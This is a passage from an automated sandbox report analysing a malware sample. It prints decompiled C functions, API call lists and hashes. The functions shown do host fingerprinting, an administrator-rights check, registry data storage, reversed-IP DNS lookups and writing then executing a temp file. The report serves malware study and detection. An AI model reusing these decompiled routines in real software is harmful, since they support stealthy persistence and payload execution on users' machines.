                                                                                  • Part of subcall function 00409064: lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
                                                                                  • Part of subcall function 00409064: WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
                                                                                  • Part of subcall function 00409064: CloseHandle.KERNEL32(00000000), ref: 00409134
                                                                                • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 004091E1
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
                                                                                • String ID:
                                                                                • API String ID: 3857584221-0
                                                                                • Opcode ID: 69a42f15c0bdb603acf61cfacf6d4b07552c73bbecf68ccfe74a45dc0564b67a
                                                                                • Instruction ID: 6acb945c628b875356ea86accac8c7b18cb61426f44bb7d0566a1afba52fbd3a
                                                                                • Opcode Fuzzy Hash: 69a42f15c0bdb603acf61cfacf6d4b07552c73bbecf68ccfe74a45dc0564b67a
                                                                                • Instruction Fuzzy Hash: 8F016DB69001187BD720A7619D49EDF3A7C9B85705F0000A6BB09E2080DAB89AC48F68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402419 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00402419(void* __ecx, CHAR* _a4, intOrPtr _a8, CHAR* _a12) {
				int _v8;
				int _t18;
				intOrPtr _t20;
				CHAR* _t21;
				int _t30;
				CHAR* _t36;

				_t18 = lstrlenA(_a12);
				_t36 = _a4;
				_v8 = _t18;
				_t20 = _a8 + _t36;
				_a8 = _t20;
				if(_t36 >= _t20) {
					L5:
					_t21 = 0;
				} else {
					while(1) {
						_t30 = lstrlenA(_t36);
						_t7 =  &(_t36[1]); // 0x1
						_a4 = _t30 + _t7;
						if(_v8 == _t30 && lstrcmpiA(_t36, _a12) == 0 && _a4 < _a8) {
							break;
						}
						_t36 =  &(_t36[lstrlenA(_a4) + _t30 + 2]);
						if(_t36 < _a8) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t21 = _a4;
				}
				L6:
				return _t21;
			}









                                                                                0x00402429
                                                                                0x0040242b
                                                                                0x0040242e
                                                                                0x00402434
                                                                                0x00402436
                                                                                0x0040243b
                                                                                0x00402474
                                                                                0x00402474
                                                                                0x0040243d
                                                                                0x0040243d
                                                                                0x00402440
                                                                                0x00402442
                                                                                0x00402446
                                                                                0x0040244c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040246b
                                                                                0x00402472
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402472
                                                                                0x0040247b
                                                                                0x0040247b
                                                                                0x00402476
                                                                                0x0040247a

                                                                                APIs
                                                                                • lstrlenA.KERNEL32(?,localcfg,?,00000000,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001), ref: 00402429
                                                                                • lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 0040243E
                                                                                • lstrcmpiA.KERNEL32(?,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg), ref: 00402452
                                                                                • lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 00402467
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$lstrcmpi
                                                                                • String ID: localcfg
                                                                                • API String ID: 1808961391-1857712256
                                                                                • Opcode ID: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
                                                                                • Instruction ID: 10b525c6ae3f8891cd48fd25e34f392daf9ed257baad57177c8ccf48abf1fcea
                                                                                • Opcode Fuzzy Hash: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
                                                                                • Instruction Fuzzy Hash: B4011A31600218EFCF11EF69DD888DE7BA9EF44354B01C436E859A7250E3B4EA408A98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401AC3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 64%
                                                                                			E00401AC3() {
				signed int _v8;
				char _v12;
				signed int _v16;
				struct HINSTANCE__* _t19;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr* _t28;
				signed int _t39;
				void* _t41;
				intOrPtr _t43;

				_v16 = 0;
				_t19 = LoadLibraryA("Iphlpapi.dll");
				if(_t19 == 0) {
					L15:
					return _v16;
				}
				_t28 = GetProcAddress(_t19, "GetAdaptersAddresses");
				if(_t28 == 0) {
					L14:
					goto L15;
				}
				_push( &_v12);
				_v8 = 0;
				_v12 = 0;
				_push(0);
				while(1) {
					_t41 =  *_t28(2, 0, 0);
					if(_t41 != 0x6f) {
						break;
					}
					_t24 = E0040EBED(_v8, _v12);
					if(_t24 == 0) {
						break;
					}
					_push( &_v12);
					_v8 = _t24;
					_push(_t24);
				}
				if(_t41 != 0) {
					L11:
					if(_v8 != 0) {
						E0040EC2E(_v8);
					}
					L13:
					goto L14;
				}
				_t26 = _v8;
				if(_t26 == 0) {
					goto L13;
				} else {
					goto L8;
				}
				do {
					L8:
					_t43 =  *((intOrPtr*)(_t26 + 0x34));
					_t39 = 0;
					if(_t43 <= 0) {
						goto L10;
					} else {
						goto L9;
					}
					do {
						L9:
						_v16 = _v16 ^ ( *(_t26 + _t39 + 0x2c) & 0x000000ff) << (_t39 & 0x00000003) << 0x00000003;
						_t39 = _t39 + 1;
					} while (_t39 < _t43);
					L10:
					_t26 =  *((intOrPtr*)(_t26 + 8));
				} while (_t26 != 0);
				goto L11;
			}













                                                                                0x00401ad1
                                                                                0x00401ad4
                                                                                0x00401adc
                                                                                0x00401b6b
                                                                                0x00401b70
                                                                                0x00401b70
                                                                                0x00401aef
                                                                                0x00401af3
                                                                                0x00401b6a
                                                                                0x00000000
                                                                                0x00401b6a
                                                                                0x00401af9
                                                                                0x00401afa
                                                                                0x00401afd
                                                                                0x00401b00
                                                                                0x00401b1c
                                                                                0x00401b22
                                                                                0x00401b27
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401b09
                                                                                0x00401b12
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401b17
                                                                                0x00401b18
                                                                                0x00401b1b
                                                                                0x00401b1b
                                                                                0x00401b2b
                                                                                0x00401b5b
                                                                                0x00401b5e
                                                                                0x00401b63
                                                                                0x00401b68
                                                                                0x00401b69
                                                                                0x00000000
                                                                                0x00401b69
                                                                                0x00401b2d
                                                                                0x00401b32
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401b34
                                                                                0x00401b34
                                                                                0x00401b34
                                                                                0x00401b37
                                                                                0x00401b3b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401b3d
                                                                                0x00401b3d
                                                                                0x00401b4c
                                                                                0x00401b4f
                                                                                0x00401b50
                                                                                0x00401b54
                                                                                0x00401b54
                                                                                0x00401b57
                                                                                0x00000000

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetAdaptersAddresses$Iphlpapi.dll
                                                                                • API String ID: 2574300362-1087626847
                                                                                • Opcode ID: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
                                                                                • Instruction ID: f6c238f91e07a5798e813b0b618c72a9a5addbcd8e0b61e0281ff71d4ef1483f
                                                                                • Opcode Fuzzy Hash: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
                                                                                • Instruction Fuzzy Hash: 3D11DA71E01124BFCB11DBA5DD858EEBBB9EB44B10B144077E005F72A1E7786E80CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401BDF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 76%
                                                                                			E00401BDF() {
				long _v8;
				long _v12;
				void* _v27;
				char _v28;
				void* _t14;
				signed int _t21;
				signed int _t30;
				void* _t31;

				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t30 = 0;
				_v12 = 0;
				asm("stosb");
				_v8 = 0xf;
				_t14 = E00401AC3();
				if(_t14 == 0) {
					if(GetComputerNameA( &_v28,  &_v8) == 0) {
						L6:
						GetVolumeInformationA(0, 0, 4,  &_v12, 0, 0, 0, 0);
						return _v12;
					}
					_t21 = 0;
					if(_v8 <= 0) {
						goto L6;
					} else {
						goto L3;
					}
					do {
						L3:
						_t30 = _t30 ^  *(_t31 + _t21 - 0x18) << (_t21 & 0x00000003) << 0x00000003;
						_t21 = _t21 + 1;
					} while (_t21 < _v8);
					if(_t30 == 0) {
						goto L6;
					}
					return _t30;
				}
				return _t14;
			}











                                                                                0x00401bec
                                                                                0x00401bf2
                                                                                0x00401bf3
                                                                                0x00401bf4
                                                                                0x00401bf5
                                                                                0x00401bf7
                                                                                0x00401bf9
                                                                                0x00401bfc
                                                                                0x00401bfd
                                                                                0x00401c04
                                                                                0x00401c0b
                                                                                0x00401c1d
                                                                                0x00401c45
                                                                                0x00401c51
                                                                                0x00000000
                                                                                0x00401c57
                                                                                0x00401c1f
                                                                                0x00401c24
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401c26
                                                                                0x00401c26
                                                                                0x00401c35
                                                                                0x00401c37
                                                                                0x00401c38
                                                                                0x00401c3f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401c41
                                                                                0x00401c5e

                                                                                APIs
                                                                                  • Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                  • Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                • GetComputerNameA.KERNEL32 ref: 00401C15
                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000001), ref: 00401C51
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressComputerInformationLibraryLoadNameProcVolume
                                                                                • String ID: hi_id$localcfg
                                                                                • API String ID: 2777991786-2393279970
                                                                                • Opcode ID: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
                                                                                • Instruction ID: b3a67a5cb4ed68e183e77afdc8505cc80d304e276af6d439446d09174096bcc5
                                                                                • Opcode Fuzzy Hash: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
                                                                                • Instruction Fuzzy Hash: B2018072A44118BBEB10EAE8C8C59EFBABCAB48745F104476E602F3290D274DE4486A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406EDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 68%
                                                                                			E00406EDD() {
				int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				signed int _t12;
				int _t15;
				int* _t16;

				_t12 =  *0x412048; // 0xffffffff
				if(_t12 < 0) {
					_v20.Value = 0;
					_v16 = 0x500;
					_t15 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
					_v8 = _t15;
					if(_t15 != 0) {
						_t6 =  &_v8; // 0x40702a
						_t16 = _t6;
						__imp__CheckTokenMembership(0, _v12, _t16);
						if(_t16 != 0) {
							 *0x412048 = 0 | _v8 == 0x00000000;
						}
						FreeSid(_v12);
					}
					_t12 =  *0x412048; // 0xffffffff
					if(_t12 != 0) {
						_t12 = E00406E36(0x12, 0);
						 *0x412048 = _t12;
					}
				}
				return _t12;
			}










                                                                                0x00406ee0
                                                                                0x00406eed
                                                                                0x00406f06
                                                                                0x00406f09
                                                                                0x00406f0f
                                                                                0x00406f15
                                                                                0x00406f1a
                                                                                0x00406f1c
                                                                                0x00406f1c
                                                                                0x00406f24
                                                                                0x00406f2c
                                                                                0x00406f36
                                                                                0x00406f36
                                                                                0x00406f3e
                                                                                0x00406f3e
                                                                                0x00406f44
                                                                                0x00406f4b
                                                                                0x00406f50
                                                                                0x00406f57
                                                                                0x00406f57
                                                                                0x00406f4b
                                                                                0x00406f5e

                                                                                APIs
                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00406F0F
                                                                                • CheckTokenMembership.ADVAPI32(00000000,?,*p@), ref: 00406F24
                                                                                • FreeSid.ADVAPI32(?), ref: 00406F3E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                • String ID: *p@
                                                                                • API String ID: 3429775523-2474123842
                                                                                • Opcode ID: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
                                                                                • Instruction ID: a55d58a6849641b9de595c9770ce5785232f8714219103e6702645194e06a02f
                                                                                • Opcode Fuzzy Hash: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
                                                                                • Instruction Fuzzy Hash: 6701E571904209AFDB10DFE4ED85AAE7BB8F708304F50847AE606E2191D7745A54CB18
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E328EB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: gethostbynameinet_addr
                                                                                • String ID: time_cfg$u6A
                                                                                • API String ID: 1594361348-1940331995
                                                                                • Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                • Instruction ID: b13e1236de4f5062c8b5a49233bd66f005b669dfcd824bf3ad8064169c87c9a0
                                                                                • Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                • Instruction Fuzzy Hash: CEE08C306041119FCB008B28F848AC53BA4AF4A330F008188F180E31A0C7349C81E644
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E369C3 Relevance: 6.2, APIs: 4, Instructions: 199COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetFileAttributesA.KERNEL32(?,00000080), ref: 00E369E5
                                                                                • SetFileAttributesA.KERNEL32(?,00000002), ref: 00E36A26
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 00E36A3A
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 00E36BD8
                                                                                  • Part of subcall function 00E3EE95: GetProcessHeap.KERNEL32(00000000,?,00000000,00E31DCF,?), ref: 00E3EEA8
                                                                                  • Part of subcall function 00E3EE95: HeapFree.KERNEL32(00000000), ref: 00E3EEAF
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesHeap$CloseFreeHandleProcessSize
                                                                                • String ID:
                                                                                • API String ID: 3384756699-0
                                                                                • Opcode ID: 7cb1483d7ca4a0334585b6ef60a3fe03637638a32adcd708d2059a772ed48796
                                                                                • Instruction ID: 565370fc42983b4acd496026c01cc8cc92145c81112137fac699111af498da63
                                                                                • Opcode Fuzzy Hash: 7cb1483d7ca4a0334585b6ef60a3fe03637638a32adcd708d2059a772ed48796
                                                                                • Instruction Fuzzy Hash: 6B71F471900219BFDB109FA4CC84AEEBFB9FB04354F10956AE515F6190D7309E92DF60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401C5F Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00401C5F(void* __eflags) {
				signed int _t49;
				signed int _t51;
				void* _t80;
				char _t91;
				void* _t92;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t107;
				void* _t108;

				_t105 = _t107 - 0x70;
				_t108 = _t107 - 0x114;
				 *(_t105 + 0x6c) =  *(_t105 + 0x6c) & 0x00000000;
				_t98 =  *(_t105 + 0x7c);
				 *(_t105 + 0x7c) =  *(_t105 + 0x7c) & 0x00000000;
				_t101 = E0040ED03(_t98, 0x2c);
				if(_t101 == 0) {
					L6:
					_t49 = _t98;
					_t32 = _t49 + 1; // 0x2
					_t102 = _t32;
					do {
						_t91 =  *_t49;
						_t49 = _t49 + 1;
					} while (_t91 != 0);
					 *((char*)(_t105 + _t49 - _t102 - 0x24)) = _t91;
					_t51 = _t98;
					_t35 = _t51 + 1; // 0x2
					_t103 = _t35;
					do {
						_t92 =  *_t51;
						_t51 = _t51 + 1;
					} while (_t92 != 0);
					E0040EE5C(_t105 - 0x24, _t98, _t51 - _t103);
					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x7b) & 0x000000ff,  *(_t105 + 0x7a) & 0x000000ff,  *(_t105 + 0x79) & 0x000000ff,  *(_t105 + 0x78) & 0x000000ff, _t105 - 0x24);
					if(E00402684(_t105 - 0xa4) != 0) {
						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);
					}
					L12:
					return  *(_t105 + 0x6c);
				}
				 *(_t105 + 0x5c) =  *(_t105 + 0x78) & 0x000000ff;
				 *(_t105 + 0x60) =  *(_t105 + 0x79) & 0x000000ff;
				 *(_t105 + 0x68) =  *(_t105 + 0x7a) & 0x000000ff;
				 *(_t105 + 0x64) =  *(_t105 + 0x7b) & 0x000000ff;
				while(1) {
					 *((char*)(_t105 + _t101 - _t98 - 0x24)) = 0;
					E0040EE5C(_t105 - 0x24, _t98, _t101 - _t98);
					_t22 = _t101 + 1; // 0x1
					_t98 = _t22;
					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x64),  *(_t105 + 0x68),  *(_t105 + 0x60),  *(_t105 + 0x5c), _t105 - 0x24);
					_t80 = E00402684(_t105 - 0xa4);
					_t108 = _t108 + 0x2c;
					if(_t80 != 0) {
						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);
					}
					 *(_t105 + 0x7c) =  *(_t105 + 0x7c) + 1;
					if( *(_t105 + 0x7c) > 0x1e) {
						goto L12;
					}
					_t101 = E0040ED03(_t98, 0x2c);
					if(_t101 != 0) {
						continue;
					}
					goto L6;
				}
				goto L12;
			}















                                                                                0x00401c60
                                                                                0x00401c64
                                                                                0x00401c6a
                                                                                0x00401c71
                                                                                0x00401c74
                                                                                0x00401c86
                                                                                0x00401c8c
                                                                                0x00401d1c
                                                                                0x00401d1c
                                                                                0x00401d1e
                                                                                0x00401d1e
                                                                                0x00401d21
                                                                                0x00401d21
                                                                                0x00401d23
                                                                                0x00401d24
                                                                                0x00401d2a
                                                                                0x00401d2e
                                                                                0x00401d30
                                                                                0x00401d30
                                                                                0x00401d33
                                                                                0x00401d33
                                                                                0x00401d35
                                                                                0x00401d36
                                                                                0x00401d42
                                                                                0x00401d6b
                                                                                0x00401d7e
                                                                                0x00401d88
                                                                                0x00401d88
                                                                                0x00401d8b
                                                                                0x00401d95
                                                                                0x00401d95
                                                                                0x00401c96
                                                                                0x00401c9d
                                                                                0x00401ca4
                                                                                0x00401cab
                                                                                0x00401cae
                                                                                0x00401cb3
                                                                                0x00401cbd
                                                                                0x00401cd2
                                                                                0x00401cd2
                                                                                0x00401ce1
                                                                                0x00401cea
                                                                                0x00401cef
                                                                                0x00401cf4
                                                                                0x00401cfe
                                                                                0x00401cfe
                                                                                0x00401d04
                                                                                0x00401d0a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401d14
                                                                                0x00401d1a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401d1a
                                                                                0x00000000

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf
                                                                                • String ID: %u.%u.%u.%u.%s$localcfg
                                                                                • API String ID: 2111968516-120809033
                                                                                • Opcode ID: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
                                                                                • Instruction ID: f60862e96afe744063ef1f8e151e0253a3d6131670b42bf9f562b78b9aabf051
                                                                                • Opcode Fuzzy Hash: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
                                                                                • Instruction Fuzzy Hash: 3C41C1729042999FDB21DF798D44BEE7BE89F49310F240066FD64E3192D639EA04CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E095 Relevance: 6.1, APIs: 4, Instructions: 92registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040E095(void* _a4, char* _a8, intOrPtr* _a12, char* _a16, int _a20) {
				int _v8;
				char* _v12;
				void* _v16;
				char _v48;
				intOrPtr* _t34;
				int _t50;
				void* _t52;
				intOrPtr _t53;
				int _t57;
				int _t58;
				void* _t59;
				void* _t60;
				void* _t61;

				_t57 = 0;
				if(RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0x20106, 0,  &_v16, 0) != 0) {
					return 0;
				}
				_v12 = _a16;
				_t34 = _a12;
				_t52 = _t34 + 1;
				do {
					_t53 =  *_t34;
					_t34 = _t34 + 1;
				} while (_t53 != 0);
				_t55 = _t34 - _t52;
				_v8 = 0;
				if(_t34 - _t52 > 0x1c) {
					_t55 = 0x1c;
				}
				E0040EE08( &_v48, _a12, _t55);
				_t50 = _a20;
				_t61 = _t60 + 0xc;
				if(_t50 <= _t57) {
					L11:
					E0040F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
					RegDeleteValueA(_v16,  &_v48);
					RegCloseKey(_v16);
					return 0 | _t50 == _t57;
				} else {
					while(1) {
						_t58 = 0xff000;
						if(_t50 < 0xff000) {
							_t58 = _t50;
						}
						E0040F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
						_t61 = _t61 + 0xc;
						if(RegSetValueExA(_v16,  &_v48, 0, 3, _v12, _t58) != 0) {
							break;
						}
						_v12 =  &(_v12[_t58]);
						_t50 = _t50 - _t58;
						_v8 = _v8 + 1;
						if(_t50 > 0) {
							continue;
						}
						break;
					}
					_t57 = 0;
					goto L11;
				}
			}
















                                                                                0x0040e09c
                                                                                0x0040e0ba
                                                                                0x00000000
                                                                                0x0040e172
                                                                                0x0040e0c3
                                                                                0x0040e0c6
                                                                                0x0040e0c9
                                                                                0x0040e0cc
                                                                                0x0040e0cc
                                                                                0x0040e0ce
                                                                                0x0040e0cf
                                                                                0x0040e0d7
                                                                                0x0040e0d9
                                                                                0x0040e0df
                                                                                0x0040e0e3
                                                                                0x0040e0e3
                                                                                0x0040e0ec
                                                                                0x0040e0f1
                                                                                0x0040e0f4
                                                                                0x0040e0f9
                                                                                0x0040e13f
                                                                                0x0040e149
                                                                                0x0040e158
                                                                                0x0040e161
                                                                                0x00000000
                                                                                0x0040e0fb
                                                                                0x0040e0fb
                                                                                0x0040e0fb
                                                                                0x0040e102
                                                                                0x0040e104
                                                                                0x0040e104
                                                                                0x0040e110
                                                                                0x0040e115
                                                                                0x0040e12f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e131
                                                                                0x0040e134
                                                                                0x0040e136
                                                                                0x0040e13b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e13b
                                                                                0x0040e13d
                                                                                0x00000000
                                                                                0x0040e13d

                                                                                APIs
                                                                                • RegCreateKeyExA.ADVAPI32(80000001,0040E2A3,00000000,00000000,00000000,00020106,00000000,0040E2A3,00000000,000000E4), ref: 0040E0B2
                                                                                • RegSetValueExA.ADVAPI32(0040E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,004122F8), ref: 0040E127
                                                                                • RegDeleteValueA.ADVAPI32(0040E2A3,?,?,?,?,?,000000C8,004122F8), ref: 0040E158
                                                                                • RegCloseKey.ADVAPI32(0040E2A3,?,?,?,?,000000C8,004122F8,?,?,?,?,?,?,?,?,0040E2A3), ref: 0040E161
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Value$CloseCreateDelete
                                                                                • String ID:
                                                                                • API String ID: 2667537340-0
                                                                                • Opcode ID: 72ec9626f1a57597f212d5c6e724b1b36c6131d7c0d684d5184da94b21603b05
                                                                                • Instruction ID: af4a942e7328ea1ce2cdf979f73f75556816175b5134196b99f0fb832a21e1c2
                                                                                • Opcode Fuzzy Hash: 72ec9626f1a57597f212d5c6e724b1b36c6131d7c0d684d5184da94b21603b05
                                                                                • Instruction Fuzzy Hash: 2F218071A00219BBDF209FA6EC89EDF7F79EF08754F008072F904A6190E6718A64DB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E341F3 Relevance: 6.0, APIs: 4, Instructions: 46filesynchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 00E3421F
                                                                                • GetLastError.KERNEL32 ref: 00E34229
                                                                                • WaitForSingleObject.KERNEL32(?,?), ref: 00E3423A
                                                                                • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E3424D
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
                                                                                • String ID:
                                                                                • API String ID: 888215731-0
                                                                                • Opcode ID: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                • Instruction ID: 31aadcf23ffd6d76fb4b80549621a4c06a1af020a9d1a1545e27535356c98ee7
                                                                                • Opcode Fuzzy Hash: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                • Instruction Fuzzy Hash: A801A5B2511109ABDF01DF90ED88BEF7BACEB08355F118461F901F20A0D7B4AA54DBB6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E3417F Relevance: 6.0, APIs: 4, Instructions: 46filesynchronizationCOMMON
                                                                                Download Yara Rule
